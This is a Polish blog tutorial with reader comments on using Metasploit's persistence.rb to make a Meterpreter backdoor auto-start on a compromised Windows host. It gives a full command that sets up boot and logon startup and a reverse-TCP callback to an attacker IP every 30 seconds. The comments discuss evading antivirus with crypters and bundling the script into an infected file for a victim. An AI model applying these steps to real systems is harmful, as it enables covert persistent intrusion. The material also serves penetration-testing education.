Jeśli korzystałeś już kiedyś z pakietu Metasploit Framework, na pewno nie jest Ci obce pojęcie Meterpretera. Jest jedna znacząca wada tego narzędzia w domyślnej konfiguracji – nie uruchamia się automatycznie wraz z startem badanego systemu operacyjnego.
Jednak tą niedogodność można bardzo szybko naprawić, za pomocą dołączonego skryptu napisanego w Ruby o jakże znaczącej nazwie persistence.
Cyberprzestępca-„haker” może właśnie w ten sposób utworzyć sobie tylną furtkę (backdoor), umożliwiającą w przyszłości na powrót do zaatakowanego systemu operacyjnego.
Autostart Meterpretera
Do uruchomienia w meterpreterze zewnętrznych skryptów służy następujące polecenie:
run <nazwa_skryptu> <argumenty opcjonalne>Sprawdźmy sobie w swoim Kalim za pomocą argumentu pomocy -h, jakie argumenty opcjonalne może przyjmować skrypt persistence.rb.
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect backOczywiście w przypadku, gdy przy argumencie występuje <opt> należy uzupełnić daną opcje dodatkową wartością argumentu.
Jak użyć persistence.rb w praktyce
Jeśli chciałbyś skorzystać z automatycznego startu meterpretera to sprawa jest bardzo prosta. Po uzyskaniu połączenia z meterpreterem wydaj w nim następujące polecenie:
run persistence -X -U -i 30 -p 16666 -r 192.168.0.19Oczywiście ustawiliśmy automatyczne uruchomienie po starcie systemu operacyjnego lub w przypadku przelogowania się usera (-X, -U).
Za pomocą parametru -i wymusiliśmy cykliczną próbę łączenia się z naszym komputerem co 30 sekund. Oczywiście ustawiliśmy odpowiedni port i nasz adres IP za pomocą parametru -p i -r.
Powyższe polecenie jest dedykowane powłokom, które mają się z nami łączyć za pomocą odwrotnych połączeń (reverse_tcp). Warto się również pobawić pozostałymi parametrami.
To by było na tyle na dziś. Jeśli trafiłeś tutaj, a nie wiesz nadal o czym mowa, polecam zapoznać się Tobie z naszym poradnikiem o tworzeniu payload w systemie Kali Linux. Warto poznać to narzędzie, ponieważ programiści poświęcili multum czasu na implementacje olbrzymiej liczby przydatnych podczas testów bezpieczeństwa funkcji. Powodzenia!
Jest jakiś antyvirus który tego nie wykrywa?
Tak.
Należało by dodać na wstępie,że obecność antyvirusa na atakowanym systemie kończy zabawę.
Pod warunkiem, że nie używa się cryptera lub nie jest to dopiero co nowa wersja Metaspolita. Szczerze mówiąc kilka sztuczek i można zejść praktycznie do poziomu FUD, jednak przy audycie bezpieczeństwa jest to zbędne. Sprawdza się wtedy czy potencjalny „amator” włamywacz da rade się włamać, a nie siłę włamuje. To tak jakby audytować hasła w firmie 15 znakowe co nie ma sensu.
Jest rada na ta aby AV tego nie wykrył? bo każdorazowo jest komunikat, więc takie tworzenie backdoora jest bezużyteczne
Do tego celu wykorzystuje się cryptery. Nawet pakiet Metaspolit miał kiedyś moduł MSFencode. Teraz został on zintegorwany z msfvenom. Logiczne jest, że gdy w dniu premiery pakietu coś jest niewykrywalne to po kilku tygodniach już jest znane dla sygnatur AV. Przestępcy piszą aktorski kod lub zlecają to zewnętrznym programistom, a nie wykorzystują do takich akurat celów publicznie dostępnych pakietów dla audytorów bezpieczeństwa. Taki pakiet ma sens tylko w przypadku zawodowych etycznych hakerów pracujących na etacie w branży Security IT.
Dzięki za pomoc. Ale takie małe pytanko. Jak zmienić kolor liter w terminalu, aby nie pokazywały się białe tylko np.:niebieskie lub żółte? Może to trochę odbiega od tematu, ale proszę o odpowiedź bo nigdzie nie mogę tego znaleźć.
Prawy przycisk myszy w obszarze terminala, następnie profile i preferencje profilu. Tam znajdziesz wszystko np: w zakładce kolory :-).
Mam pytanie o co chodzi z tym nazwa skryptu
Witam.
Po wpisaniu komendy: run persistence -h pojawia sie błąd–> Error in script: RangeError bignum too big to convert into `long’. Mozna to jakos ominąć.
Czy ten skrypt można rowniez dolaczyc do pliku z wygenerowanym exploitem? Tak, żeby uruchomienie zakażonego pliku na komputerze ofiary od razu uruchomiło skrypt autostartowy